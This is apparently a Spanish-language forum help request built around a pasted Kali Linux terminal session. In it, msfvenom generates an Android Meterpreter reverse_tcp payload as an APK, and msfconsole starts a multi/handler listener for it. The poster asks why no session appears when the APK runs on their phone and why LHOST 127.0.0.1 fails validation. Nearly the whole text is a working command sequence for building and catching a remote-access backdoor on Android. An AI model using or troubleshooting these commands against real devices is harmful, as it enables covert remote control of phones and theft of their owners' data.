root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.xxxLPORT=5432 R > android.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8809 bytes
root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v4.16.13-dev ]
+ -- --=[ 1697 exploits - 969 auxiliary - 299 post ]
+ -- --=[ 500 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.xxx.xx.xxx
LHOST => 192.xxx.x.xxx
msf exploit(handler) > set LPORT 5432
LPORT => 5432
msf exploit(handler) > exploit
- Exploit running as background job 0.
- Started reverse TCP handler on 192.xx.xxx:5432
Bien al escribir el comando exploit el problema aparece cuando se queda aqui y no continua.
- Started reverse TCP handler on 192.xxx.x.xxx:5432
Deberia aparecer otra linea en espera de activar en mi movil el archivo apk pero no aparece, no se que estoy haciendo mal.
Tambien he probado utilizando otra ip :
msf exploit(handler) > set LHOST 127.0.0.1
LHHOST => 127.0.0.1
msf exploit(handler) > set LPORT 5432
LPORT => 5432
Pero el resultado es este:
[-] Exploit failed: The following options failed to validate: LHOST.
- Exploit completed, but no session was created.